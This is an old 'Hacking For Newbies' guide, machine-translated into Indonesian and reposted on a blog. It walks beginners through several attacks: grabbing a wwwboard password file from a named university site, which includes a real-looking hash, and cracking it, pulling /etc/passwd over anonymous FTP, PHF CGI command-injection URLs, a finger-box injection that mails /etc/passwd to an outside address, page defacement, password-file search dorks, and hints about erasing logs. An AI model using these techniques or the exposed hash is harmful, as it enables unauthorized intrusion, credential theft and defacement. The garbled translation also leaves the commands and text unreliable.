Hacking For Newbies

Made pada tanggal 19 Agustus 1997.

Pendahuluan - OK, file ini ditujukan hanya untuk orang-orang yang tahu sedikit tentang hacking, dan ketika saya katakan sangat sedikit Maksudku sangat sedikit. Sekarang, bagi anda melompat gembira sekitar dan berteriak "Akhirnya, saya akan menjadi seorang hacker!" Berhenti melompat-lompat dan hanya duduk, ambil napas panjang beberapa kali, dan hanya bersantai.

Setelah membaca file ini anda harus dapat hack
1 - wwwboard A,
2 - FTP / UNIX situs,
3 - Website Trik, dan
4 - Rapi barang / Misc. dengan keyakinan banyak.

Sekarang, pada ketentuan diatas:
*** Saya TIDAK akan bertanggung jawab atas apa yang Anda lakukan dengan informasi ini. ***

CATATAN: Semua perintah yang ditulis dalam file ini, dengan pengecualian dari perintah John Ripper, seperti "edit passwd" adalah untuk DOS, jadi jika Anda memiliki UNIX menggunakan editor VI atau semacamnya.

OK, sekarang tidak ada tabel yang spesifik dari isi file ini, saya cukup banyak hanya akan membuat ketika aku pergi bersama. Sekarang, bagi Anda maju hacker di luar sana, saya akan merekomendasikan hanya meninggalkan file ini karena Anda mungkin tidak akan menemukan banyak dalam file ini bahwa Anda belum tahu. Baiklah, sekarang aku melakukan ini berteriak-teriak bodoh mengoceh, saya bisa mulai menjelaskan bagaimana cara belajar apa yang Anda ingin belajar.

1 - Cara hack sebuah wwwboard (Kredit akan km www.hackersclub.com untuk datang dengan ide cemerlang ini, memungkinkan semua salut KM.)

OK, sekarang jelas, untuk hack sebuah wwwboard Anda perlu semacam file password. Sekarang, secara default file passwd di direktori wwwboard. Kebanyakan orang yang menjalankan WWBOARD berpikir untuk diri mereka sendiri "Hmm ... Apa saja kemungkinan seorang pria datang dan ingin hack saya wwwboard?" Nah, kemungkinan cukup bagus. Sekarang, ketika saya mengatakan hack saya berarti baik hanya untuk mengeksplorasi dan hanya untuk melakukan hal-hal menyenangkan seperti menghapus file. Saya tidak mengatakan menghapus file yang BAIK, tapi kadang-kadang menyenangkan. Pokoknya, file passwd hampir selalu di direktori wwwboard, sehingga memungkinkan mengambil wwwboard nyata.

URL adalah http://www.cobleskill.edu/projects/archeo/wwwboard/. Sekarang, jika Anda pergi ke URL yang Anda akan melihat daftar file. Untuk tujuan file ini HANYA, dan bukan niat jahat, saya belum memberitahu situs dari masalah ini. Sekarang, pergi ke URL dan klik pada file passwd.txt. Anda akan mendapatkan dua kata yang terlihat seperti ini:

WebAdmin: aepTOqxOi4i8U

Kata pertama, WebAdmin, adalah username, jelas, operator ini wwwboard. The "Kata" yang kedua adalah password, sekarang, Anda mungkin duduk di sana melihat kata itu berpikir untuk diri sendiri "sialan Allah, yaitu satu password funky!" Yah, berhenti berpikir bahwa karena ya, itu adalah password, tetapi dienkripsi. Jadi, Anda harus mendapatkan password cracker. Sekarang, saya merekomendasikan salah satu dari dua Kerupuk Password, baik jagoan atau John the Ripper, kedua dapat ditemukan di http://www.hackersclub.com atau hampir semua situs hacking lainnya. Setelah Anda pergi dan mendapatkan cracker password yang Anda kemungkinan besar akan membutuhkan File Word. Mereka bisa ditemukan di http://www.hackersclub.com. Setelah Anda mendapatkan hal-hal yang diperlukan, Anda perlu menyalin file password, WebAdmin: aepTOqxOi4i8U, dan paste ke file notepad kosong atau sesuatu semacam itu. Sekarang, Anda mungkin berpikir untuk diri sendiri lagi "Baiklah, sekarang aku bisa crack ini pantat-buruk password dan menjadi seorang hacker!" Maaf untuk hujan pada parade Anda, tapi tidak ada. Ya, Anda mungkin dapat memecahkan sandi, tetapi kemudian bertanya pada diri sendiri satu pertanyaan, begitu aku password, apa yang harus saya lakukan dengan itu? Apakah saya pergi mail ke www.cobleskill.edu server dan berkata "Hei, aku passwd anda, sekarang beri saya akses lengkap untuk anda wwwboard!" Maaf, jika Anda melakukannya, Anda akan berpikir selama 10 tahun penjara "Apa yang saya lakukan salah?" atau Anda mungkin menjadi anak manis Bruno. Terdengar menyenangkan? Tidak berpikir begitu. OK, sekarang JIKA Anda crack password file, dan Anda mendapatkan Username dan Password, tidak terenkripsi tentu saja, sisipkan ke dalam sebuah dokumen teks atau sesuatu, kemudian tambahkan hak ini ke atasnya - ": -2: -2: NFS anonymous user: /: / bin / tanggal "Apa yang akan lakukan akan mengubah file wwwboard passwd ke dalam file passwd UNIX. Jika Anda tidak melakukan itu maka kamu tidak akan retak file. Semua dalam semua file passwd akan terlihat seperti ini: "WebAdmin: aepTOqxOi4i8U: -2: -2: anonim NFS user: /: / bin / date" Sekarang, saya tidak menggunakan jagoan, jadi jika anda punya yang bisa saya ' t membantu Anda, tapi jika Anda punya John the Ripper lalu ketikkan perintah ini di DOS: "john-pwfile: XXXXX-wordfile: XXXXX" XXXXX adalah apa saja yang Anda bernama file passwd atau file word. Misalnya, "john-pwfile: hehe.txt-wordfile: WF.txt" Itu hanya harus sekrup sekitar untuk sementara dan menghitung barang-barang dan kemudian jika sudah retak Anda akan mendapatkan di sisi kiri layar passwd, WebBoard, dan Username, WebAdmin. Sekarang, WebAdmin dan WebBoard adalah dua username default dan passwds. Menunjukkan Anda tentang keamanan hari ini. Sekarang, setelah Anda punya dua hal, pergi ke direktori wwwboard dan mencari file (s) disebut WWWADMIN.CGI atau WWWADMIN.PL atau WWWBOARD.CGI atau bahkan WWWBOARD.PL. Jika tidak satupun dari mereka yang ada maka anda harus memeriksa seluruh file dalam direktori. Ketika saya berada di direktori file tersebut tidak ada, tapi saya menemukan hal demikian, saya tidak akan memberi tahu Anda apa itu, tapi begitu Anda menemukan itu Anda akan mendapatkan sesuatu seperti ini:
WWWAdmin Untuk wwwboard

Metode Pilih Anda di Bawah wwwboard memodifikasi:
     Hapus File
          Hapus File
          Hapus File dengan Nomor pesan
          Hapus File by Date
          Hapus File oleh Pengarang

     Password
          Ubah Password Admin

Artinya, Anda dapat menebaknya, kecil "Operasi Stasiun" untuk wwwboard. Sekarang, untuk melakukan hal-hal Anda harus memiliki Username dan Passwd yang Anda retak. Jadi, klik pada pilihan dan saya pikir sisanya Sudah cukup jelas. Aku benar-benar tidak merekomendasikan mengacaukan wwwboard, sebagian orang bergantung pada mereka untuk mendapatkan banyak pertanyaan dan jawaban, dll saya biasanya hanya membaca semua pesan yang tersembunyi dan hal-hal seperti itu dan kemudian hanya meninggalkan atau memberitahu Operator atas wwwboard yang nya papan adalah 100% trashable.

2 - Hacking situs FTP

OK, sekarang hacking sebuah situs FTP WS cukup mudah beberapa waktu lalu, namun kini kebanyakan file passwd yang dibayangi yang menambahkan sedikit tambahan keamanan. Aku akan menjelaskannya nanti. OK, sekarang, sebelum kita mulai, file passwd pada mesin UNIX adalah "passwd" tidak "passwd.txt." OK, sekarang, untuk situs contoh kita akan menggunakan http://www.freestuff.com. Sekarang, dengan informasi ini saya akan memberikan Anda tidak akan membiarkan Anda hack situs ini karena berkas passwd gelap, karena hampir setiap website yang tunggal, namun demikian, jika Anda "pengalaman" hacking cukup lama, Anda akan menemukan jawaban atas bagaimana untuk mendapatkan file. OK, sekarang langkah pertama adalah untuk melakukan 1 dari 2 hal, mendapatkan browser FTP, seperti CuteFTP atau BulletFTP atau sesuatu, atau Anda dapat menggunakan Win95 FTP yang tak benar-benar tahu tentang dan bagaimana aku menemukan berada di luar ingatanku. OK, saya akan menjelaskan cara FTP browser pertama. OK, jalankan Browser FTP dan untuk plug nama host di www.freestuff.com dan untuk meninggalkan pelabuhan itu pada apapun itu, dan tekan terhubung, jika ada pilihan lain, maka hanya sekrup-main dengan mereka untuk sementara dan Anda akan mencari tahu. Anyway, untuk jenis akses atau apapun, klik Anonymous, dan setelah anda menekan menghubungkan Anda akan mendapatkan beberapa direktori di kotak Host Remote, dan beberapa barang rapi lainnya di Lokal Host. Sekarang, di bagian Host Remote ingin Anda klik dua kali pada direktori "etc" jika terlihat, jika tidak, maka lihat dalam menu pull-down jika ada sebuah opsi bernama perintah khusus. Jika ada kemudian klik dan untuk jenis perintah "cd etc" dan itu akan baik berkata "OK, CWD perintah diterima" atau sesuatu sepanjang garis itu atau ia akan berkata "..: Akses Ditolak" atau bahkan " Error: Tidak ada file atau direktori dengan nama tersebut ". Jika Anda mendapatkan perintah CWD diterima maka ada di bisnis. Dalam direktori / etc / Anda akan melihat file bernama passwd. Jika Anda tidak kemudian kembali ke perintah custom bagi jenis perintah "get / etc / passwd" dan itu akan baik berkata "OK, perintah Port sukses" atau ia akan berkata "..:. Akses Ditolak" Jika Anda melihat file yang maka Anda hanya dapat menyeret file ke host lokal dan kemudian klik tombol "Start Download" atau "Mulai Query" atau sesuatu seperti itu.

Sekarang, jika Anda memiliki Win95 FTP Anda akan harus pergi ke Start Menu MS-DOS Prompt dan ketik "FTP WWW.FREESTUFF.COM" dan itu akan muncul sekelompok kecil yang rapi pesan seperti "menghubungkan ke www.freestuff.com "barang dan lainnya. Akhirnya Anda akan sampai di layar login mana ia akan mengatakan "(USER)" atau sesuatu yang menarik dan panjang seperti itu. Sekarang, untuk jenis pengguna dalam Anonymous. Jika menerima ia akan berkata "Password" atau ia akan berkata, "Anonymous akses tidak diperbolehkan di server ini." Sekarang, jelas FBI atau CIA tidak akan membiarkan akses FTP, sehingga bahkan tidak mencobanya. Sekarang, jika Anda mendapatkan pada bagian password, ketik saja sesuatu yang menarik seperti "Suckhole @" dan server ftp akan mengisi sisanya. Anda dapat membuat apapun yang Anda inginkan, sekarang Anda akan mendapatkan 1 dari 2 pesan, dalam kesalahan marjinal, "Tidak dapat mengatur hak akses tamu" atau ini "Anonymous akses diperbolehkan, keistimewaan tamu set." Mereka harus menjadi hanya dua yang Anda dapatkan. Jika ada orang lain, pesan-pesan ini cukup jelas. Sekarang, ketika Anda log on, hal pertama yang Anda ingin mengetik perintah ini "pwd." Hanya itu, akan menampilkan direktori saat ini bahwa Anda masuk Anda ingin untuk mengatakan "/." Jika tidak kemudian ketik perintah ini sekitar 3 kali "cd .." Yang akan membawa Anda turun 1 direktori / subdirektori. Setelah Anda mendapatkan ke direktori "/", ketik perintah "ls-a." Ini akan menampilkan semua file dalam direktori, termasuk yang tersembunyi. Sekarang, jika anda melihat sesuatu dalam daftar yang mengatakan "dll" lalu ketik perintah ini "cd dll" Itu akan memindahkan Anda ke direktori "dll". Hanya untuk memastikan, ketik "pwd" lagi untuk memastikan Anda berada di direktori "dll". Jika Anda, maka baik, dan ketik "ls-a" lagi dan Anda harus mendapatkan beberapa file: "pwd.db, passwd, kelompok, netconfig, net.config, atau mungkin bahkan master.passwd." Dua file kita paling tertarik adalah "passwd" dan "master.passwd." Saya pikir apa file pegang adalah jenis cukup jelas, tapi aku akan memberitahu Anda Lagi pula, "passwd" file menyimpan semua username dan passwd yang ada di seluruh sistem yang anda di sekitar perakaran. The "master.passwd" file hanya akan muncul jika file passwd gelap, dan juga berarti sysadmin adalah otak anak anjing lengkap. Lupakan "master.passwd" untuk saat ini. Perintah yang Anda ingin untuk menerbitkan untuk sistem ini adalah untuk mendapatkan "passwd" file dari komputer mereka ke komputer Anda, dan kami melakukannya dengan hanya mengetik, "get passwd." Ini harus muntah Facebook beberapa barang rapi, dan kemudian mulai mentransfer file. Ketika Anda kembali ke ftp prompt Anda akan memiliki file passwd di C: \ drive atau di mana pun Anda memulai "www.freestuff.com ftp" dari. Sekarang, Anda hanya ingin ketik "berhenti." Itu akan membuat Anda log off server. Sekarang, untuk beberapa alasan yang tepat ketika Anda logoff server yang Anda ingin login kembali hanya menekan tombol "F3" dan itu akan muncul perintah terakhir Anda. Sekarang, apa yang ingin Anda lakukan adalah memindahkan file passwd ke mana pun kerupuk passwd anda. Anda dapat melakukannya dengan mengetik, "bergerak passwd X:. \ XX" X adalah drive yang kerupuk passwd Anda ada di dan XX adalah direktori passwd cracker masuk Kemudian harus mengatakan sesuatu seperti ini: passwd -------> X: \ XX -> OK "atau sesuatu seperti yang Setelah Anda memindahkan file passwd ke direktori kerupuk passwd dan membuka file dengan mengetik "passwd Edit." Jika berkas ini telah sekelompok hal yang terlihat seperti ini.:

root: x: x: x: x: x: x:
daemon: x: x: x: x: x: x

Jika terlihat seperti itu, tidak semua x, hanya satu dengan nama pengguna, maka file passwd bayangan dan tidak dapat retak, mungkin juga menghapusnya (info lebih lanjut tentang passwd gelap di bagian bawah file ini). Jika tidak shadow kemudian ketik saja perintah passwd cracking dan bersiap-siap untuk hack server! Saya masih sangat merekomendasikan tidak melakukan kerusakan, ada banyak cara untuk terjebak dan hanya untuk membantu situs-situs di luar sana aku tidak akan memberitahu Anda cara yang mereka dapat menangkap Anda, Tapi jangan khawatir, setiap keluar 8 dari 10 server yang sadar memiliki mencoba hack tidak melaporkan hal itu dan hanya pergi tentang sana bisnis. Sekarang, satu hal lagi, jika Anda mendapatkan di server dengan akses root (root pada dasarnya berarti bahwa Anda dapat melakukan apapun, Anda adalah Tuhan pada sistem ini) maka ada file log yang merekam apa yang terjadi pada Anda, sekarang, saya pikir saya menyerahkan Anda lebih dari informasi yang cukup, jadi saya akan membiarkan Anda menemukan cara untuk menghapus kehadiran Anda dari sistem, ada banyak. file txt di luar sana yang memberitahu Anda bagaimana untuk melakukannya.

3 - Trik Website

OK, sekarang ini trik Website ini "trik" untuk mendapatkan file passwd tanpa menggunakan FTP Browser atau FTP Browser.

The PHF Trik
OK, sekarang trik ini phf adalah perintah agak rumit (hehehe), tidak untuk digunakan, tetapi dalam kenyataan bahwa beberapa situs telah menambahkan dalam kode HTML sana yang jika perintah phf dikeluarkan maka akan menampilkan pesan seperti "Smile Anda pada candid camera! " atau akan mengatakan ini "Usaha Anda hack sudah dicatat dan dikirim ke pihak yang berwenang." Duduk neraka ke bawah, drop bahwa senapan, unbar pintu Anda, dan berhenti merintih tentang bagaimana Anda akan mendapatkan mendobrak dan diperkosa di penjara oleh lusuh. 90% dari waktu mereka hanya bullshitting Anda dan kepada mereka yang berwenang bisa di negara deep-dish-yak-dick atau dalam Bum Fuck Mesir. Mereka hanya melakukan itu untuk menakut-nakuti hidup kotoran keluar dari Pemula atau siapa saja yang melakukan itu. Ini adalah omong kosong, jadi berhenti khawatir. OK, sekarang tentang cara untuk melakukan trik phf. Trik ini hampir tidak pernah bekerja lagi, tapi hei, menyenangkan untuk mencoba situs sekolah tua dan hal-hal seperti itu. Saya tidak memiliki situs contoh karena aku benar-benar tidak ingin memburu situs yang trik ini bekerja, jadi pergi mencari pada diri sendiri dan tidak mengirim saya e-mail tentang bagaimana Anda tidak dapat menemukan sebuah situs yang ini tidak bekerja pada. Untuk melakukan trik ini situs harus memiliki / cgi-bin / direktori. Jika tidak, maka tinggalkan saja dan melupakan hal sialan seluruh di situs tersebut, tetapi jika tidak maka terus membaca. Saya akan membuat ini cepat, contoh akan menjadi ini:%% 0a/bin/cat http://www.Imanasshole.org/cgi-bin/phf?Qalias=x 20/etc/passwd
Itu akan memunculkan file passwd, tetapi 95% dari waktu Anda akan mendapatkan ini sangat umum dan bahkan lebih sangat jelek error tentang bagaimana file tidak ada. OK, itu trik phf. Sekarang, ke jari-kotak trik hacking.

Jari-Box Hacking
Sekali lagi untuk kotak-jari hack untuk bekerja Anda harus menemukan website dengan bin / cgi-/ direktori. Saya hanya akan posting garis dasar perintah untuk ini menyebabkan jari saya menjadi sangat lelah mengetik :-) ini. Contoh dari jari-kotak hack adalah ini:

http://www.XXXXX.com/cgi-bin/finger

Setelah Anda tipe orang yang dalam Anda akan mendapatkan sebuah kotak, jika Anda tidak maka jari tidak ada atau Anda tidak memiliki akses untuk itu, dan dalam jenis kotak ini:

nobody@nowhere.org; / bin / mail <me@junk.org etc / passwd

Pengganti mana perlu, saya tidak pernah benar-benar mendapatkan trik ini untuk bekerja karena aku belum pernah mencobanya lebih dari sekali atau dua kali karena aku tidak pernah membutuhkannya, tapi aku tahu tentang hal ini sehingga pergi :-) gila.

Menulis ulang Halaman Web Kanan Dari Anda Web Browser
Untuk melakukan trik ini lagi anda membutuhkan / cgi-bin / direktori di situs Anda "target". Misalnya, jenis ini bila Anda memiliki sebuah situs web yang memiliki / cgi-bin / direktori:

% Http://www.XXXXX.com/cgi-bin/phf?Qalias=x 0a/bin/echo% 20 "beberapa hal"% 2

"Beberapa hal" adalah apa pun yang Anda ingin menambahkan pada dasarnya, tetapi waspadalah, kadang-kadang dapat melacak situs web Anda menggunakan cookie yang dikirim saat ada halaman, jadi hanya untuk memastikan bahwa mereka tidak memiliki permintaan cookie, jika Anda memiliki Netscape, maka dalam konfigurasi suatu tempat, aku lupa di mana, centang kotak yang menyatakan "Aktifkan memberitahukan Anda bila menerima cookie" atau sesuatu yang tampak di sepanjang garis itu.

4 - Rapi barang / Misc.

Hal pertama yang saya akan menutup hanya beberapa trik yang sangat menarik yang aku tahu tentang AltaVista, http://www.Altavista.com. Trik ini hanya melibatkan anda mengetik sesuatu untuk permintaan pencarian. OK, berikut adalah daftar kata dan hal-hal yang akan membawa file-file yang sangat menarik dari website:

root:
akar
passwd.txt
wwwadmin.cgi
wwwboard.cgi
wwwadmin.pl
wwwboard.pl
passwd (Catatan: seharusnya untuk membuka file UNIX passwd tapi saya belum mencobanya, jadi jika Anda mencoba mengirim saya e-mail dan biarkan aku tahu apa yang terjadi).
wwwboard (Catatan: membawa pada direktori wwwboard sehingga Anda dapat mencari file passwd.txt dan hal-hal rapi lainnya).
master.passwd (Catatan: lagi, tidak pernah mencobanya, jadi saya mengirim umpan balik, biarkan aku tahu kalau itu bahkan sebenarnya sepadan dengan waktu some1's mengetik dalam, atau hanya tipuan).

OK, kata-kata bekerja di sekitar hampir setiap mesin pencari, tapi bekerja paling baik dengan AltaVista karena AltaVista pencarian link di halaman dalam ini arsip untuk kata-kata Anda, dan hampir setiap halaman memiliki link ke file passwd itu atau sesuatu lain yang menarik .

OK, sekarang ini trik berikutnya saya berpikir ketika saya d / menyebabkan HakTek untuk check it out itu memiliki fitur-mail dibom menghapus pesan, sekarang, jika Anda tidak memiliki HakTek, dan tidak ingin / tidak bisa ' menemukannya, kemudian hanya masuk ke direktori mail dari browser web Anda, dan menghapus semua surat dan mail bomber telah menyia-nyiakan waktunya.

Sekarang saya hanya akan memberikan beberapa perintah UNIX dan apa yang mereka lakukan, jadi jika Anda ingin menjadi seorang penggemar UNIX atau LINUX kipas ini kemudian check out:
cd X - X = direktori yang Anda ingin beralih ke
ls - menampilkan semua file dalam direktori, termasuk yang tersembunyi
ls-a - daftar semua file dalam direktori, termasuk yang tersembunyi
ls-A - menampilkan daftar semua file yang tersembunyi dalam sebuah direktori, tapi tidak. dan ..
ls-ALF - daftar properti dari semua file dalam suatu direktori
cd .. - Turun satu direktori / subdirektori
cd. - Sama sekali tidak ada!
berhenti - log off situs ftp (jelas hanya pada Win95 FTP)

Perintah-perintah yang tercantum di atas bekerja pada KEDUA situs FTP DAN mesin UNIX, sekarang di sini adalah perintah yang HANYA bekerja pada mesin UNIX:

kucing X - file yang ingin Anda lihat
vi - Visual Editor yang dapat Anda gunakan untuk mengedit file
edit - mengedit file (tidak yakin yang satu ini, bekerja pada beberapa UNIX's)
ed - mengedit file (pada semua mesin)
chmod - merubah kepemilikan file
membantu - daftar perintah yang dapat Anda gunakan (Catatan: * sebelah perintah berarti bahwa tidak digunakan pada mesin UNIX yang tertentu)
Pria X - untuk informasi lebih lanjut tentang perintah UNIX TERTENTU sedangkan X adalah perintah yang Anda ingin informasi lebih lanjut tentang

Yah, bahwa sekitar melakukannya untuk file ini, tapi aku benar-benar tidak ingin membungkusnya jadi saya akan menambahkan beberapa link yang akan membantu anda BANYAK dalam perjalanan anda, jadi kunjungi semua link untuk semua alat dan lainnya hal-hal yang Anda perlu:

http://www.hackersclub.com - Sebuah situs luar biasa, saya memberikan dua jempol :-).
http://project-one.com - Dalam Konstruksi, di mana file ini dimaksudkan).
http://hackers.com - Dalam MAYOR Konstruksi, akan menjadi salah satu situs terbaik yang pernah hacking, rumah Wahyu, saya tidak kenal dia, tetapi jika ia membaca file ini, maka wahyu Hi! :-).
http://www.adirtroad.com - TONS hal rapi, dan TONS link bebas-barang, sekali lagi, dua-thumbs up :-).
http://easyweb.easynet.co.uk/ ~ davegraham / britpack.htm - Brit Hack Pack, ada desas-desus terjadi di sekitar bahwa ada file Virii memiliki, yang merupakan sekelompok BS, saya mendukung mereka sepenuhnya, meskipun saya ':-) m tidak Inggris.
http://www.wtp.net/ ~ Xeno / main.htm - Sebuah situs di sekitar baik
http://www.geocities.com/SiliconValley/3078/frame2.html - Yah, aku benar-benar hanya meliputi link ini menyebabkan pemimpin kelompok ini dan orang yang menjalankan halaman suka menyebabkan pemusnah massal, dan dia lucu untuk menonton , jadi tetap menjadi lucu Senat :-).
http://www.WorkingDesigns.com - Sama sekali tidak ada hubungannya dengan hacking hanya tempat yang bagus untuk pergi jika Anda memiliki salah satu dari game RPG ada, berharap mereka menyelesaikan situs tersebut dalam waktu dekat ... dan link terakhir saya:
http://www.freestuff.com - Anda ingat bahwa benar situs? Aku berpikir begitu, kira apa yang Anda temukan di sana???

Yah, saya harap Anda menikmati file ini dan belajar banyak dari itu, aku pasti menaruh banyak mengetik ke dalamnya, jadi jika Anda benar-benar ingin kirimi saya uang .... Aku berarti sumbangan, hehe, jangan, menyimpan uang Anda, karena aku yakin Anda memiliki hal-hal yang lebih baik untuk menghabiskan di kemudian memberikan kepada saya :-), * mental memukul diriku sendiri karena menolak uang *. OK, well, aku mungkin akan menulis file lebih banyak karena aku menikmati menulis hal Newbie, begitu baik, jika anda ingin e-mail saya kirim email ke: RAWTAZ@CONNIX.COM

Dan aku akan kembali kepada Anda kapan pun aku bisa. Hang di sana, Anda akan sampai di sana suatu hari nanti :-).

My "Quote" Of The (hehe) Hari:
Frustrasi Person: "MENGAPA TIDAK AKAN HAL INI ?!?!?!?" DAMN KERJA
Tenang, Bersih dicukur Guru: "Perhatikan itu, apa yang Anda temukan yang salah dengan itu?"
Frustrasi Person: "TIDAK ADA, IT IS RUSAK!"
Tenang, Bersih dicukur Guru: "Kalian harus cepat marah, belajar sabar."
Frustrasi Person: "MENGAPA KESABARAN, ITS !!!!!!!" RUSAK
Tenang, Bersih dicukur Guru: "Ini tidak terpasang masuk"
Frustrasi Orang: "Oh, saya tahu itu."
Moral dari cerita: Kesabaran adalah senjata pamungkas

-Phooey

0 komentar:

Posting Komentar